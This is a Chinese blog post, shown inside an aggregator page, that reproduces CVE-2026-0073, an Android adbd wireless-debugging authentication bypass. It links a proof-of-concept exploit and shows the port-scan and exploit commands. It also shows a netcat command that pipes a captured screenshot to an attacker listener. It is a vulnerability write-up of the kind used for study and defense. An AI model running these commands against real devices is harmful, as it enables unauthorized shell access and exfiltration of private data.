惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

J
Java Code Geeks
GbyAI
GbyAI
阮一峰的网络日志
阮一峰的网络日志
Cloudbric
Cloudbric
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
宝玉的分享
宝玉的分享
I
Intezer
Simon Willison's Weblog
Simon Willison's Weblog
博客园_首页
The Cloudflare Blog
C
Cisco Blogs
AWS News Blog
AWS News Blog
IT之家
IT之家
Cyberwarzone
Cyberwarzone
罗磊的独立博客
美团技术团队
V
V2EX
Project Zero
Project Zero
A
Arctic Wolf
C
Cyber Attacks, Cyber Crime and Cyber Security
大猫的无限游戏
大猫的无限游戏
博客园 - 叶小钗
月光博客
月光博客
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
酷 壳 – CoolShell
酷 壳 – CoolShell
博客园 - 聂微东
有赞技术团队
有赞技术团队
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
雷峰网
雷峰网
S
Schneier on Security
P
Privacy International News Feed
V
Visual Studio Blog
量子位
T
Tor Project blog
S
Securelist
腾讯CDC
A
About on SuperTechFans
T
Threat Research - Cisco Blogs
G
GRAHAM CLULEY
B
Blog RSS Feed
D
DataBreaches.Net
博客园 - 三生石上(FineUI控件)
B
Blog
NISL@THU
NISL@THU
L
Lohrmann on Cybersecurity
V
Vulnerabilities – Threatpost
人人都是产品经理
人人都是产品经理
博客园 - 【当耐特】
L
LINUX DO - 热门话题
Recorded Future
Recorded Future

lololowe的博客

《防火墙项目化实战 (基于华为eNSP)》笔记 华为VLAN高级特性与协议详解 DNS 跨平台托管 使用 Bettercap 进行 HTTPS 中间人攻击:SSL 剥离和 HSTS 绕过 Yakit测试PortSwigger靶场-未授权访问 visio导入Mermaid流程图(SVG格式) 什么是 TiT (TLS in TLS) 特征以及如何消除特征 部署 Wireguard VPN 实现异地组网 Redis未授权访问漏洞复现 实现防御ARP劫持与主动反击 华为VRP系统基本操作 mrs文件转换与查看 电脑垃圾清理技巧分享 QQ音乐 2015-2025 年度听歌报告链接汇总 基于DevStack快速部署OpenStack
CVE-2026-0073 安卓调试桥漏洞复现
lololowe · 2026-05-09 · via lololowe的博客

AI初始化中...

介绍自己 🙈

生成本文简介 👋

推荐相关文章 📖

前往主页 🏠

前往爱发电购买

网络安全渗透

1. 前言

CVE-2026-0073是安卓的系统组件 adbd 的身份验证漏洞,攻击者构造特定的TLS握手包,可以绕过adbd的身份验证机制,直接RCE。

受影响的安卓版本如下(未安装2026年五月的安全补丁):

  • android:14.0
  • android:15.0
  • android:16.0
  • android:16.0:qpr2_beta_1
  • android:16.0:qpr2_beta_2
  • android:16.0:qpr2_beta_3

触发条件:

  • 开启了无线调试并且无线调试的端口可被访问
  • 曾经授权过USB调试或者无线调试(表现为/data/misc/adb/adb_keys文件中存在至少一个密钥)

漏洞数据库:https://nvd.nist.gov/vuln/detail/CVE-2026-0073

2. 漏洞复现

2.1. 正常调试流程

正常的调试连接流程如下:

  1. 目标主机开启了无线调试

alt text

  1. 目标主机使用配对码配对设备

  2. 电脑使用adb工具包对目标和主机进行连接和配对:adb pair 172.20.10.4:随机端口

  3. adb devices查看连接状态

alt text

  1. adb -s 设备名称 shell进入shell

alt text

2.2. 漏洞利用流程

使用EXP进行漏洞利用则只需要符合触发条件即可绕过授权码直接拿到adb shell

EXP下载地址:https://raw.githubusercontent.com/SecTestAnnaQuinn/CVE-2026-0073-Android-adbd-authentication-bypass-POC/refs/heads/main/adb_tls_auth_bypass.py

通过端口扫描工具扫描目标主机的无线调试端口,确认端口开放后直接运行EXP即可:

1
2
rustscan -r 1-65535 -a 172.20.10.2
python adb_tls_auth_bypass.py 172.20.10.2 35755

alt text

alt text

获得 shell 用户权限后,虽然不是 root,但足以访问大量敏感数据。

下面演示一下获取设备当前屏幕截图以及回传文件到攻击机。

在shell中使用screencap -p /sdcard/sc.png命令将截图保存到手机存储中,然后在攻击机上用ncat -lv 9999 > sc.png开启监听,最后再在shell中使用cat /sdcard/sc.png | nc 172.20.10.3 9999将截图传输到攻击机上:

alt text

alt text

注意:无法使用adb pull命令直接将文件传输到攻击机上,因为该命令的前提是已经通过配对码成功配对了设备,而EXP绕过了配对码的验证,所以无法使用adb pull命令进行文件传输。只能通过其他方式(如上面演示的使用nc命令,或者curl命令发post)将文件传输到攻击机上。

推荐阅读ADB用法大全获取更多ADB shell的使用方法:https://mazhuang.org/awesome-adb/

头像头像

lololowe

恬淡无为

打赏作者

感谢你赐予我前进的力量

  • Bitcoin

    Bitcoin

  • Ethereum

    Ethereum

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 lololowe的博客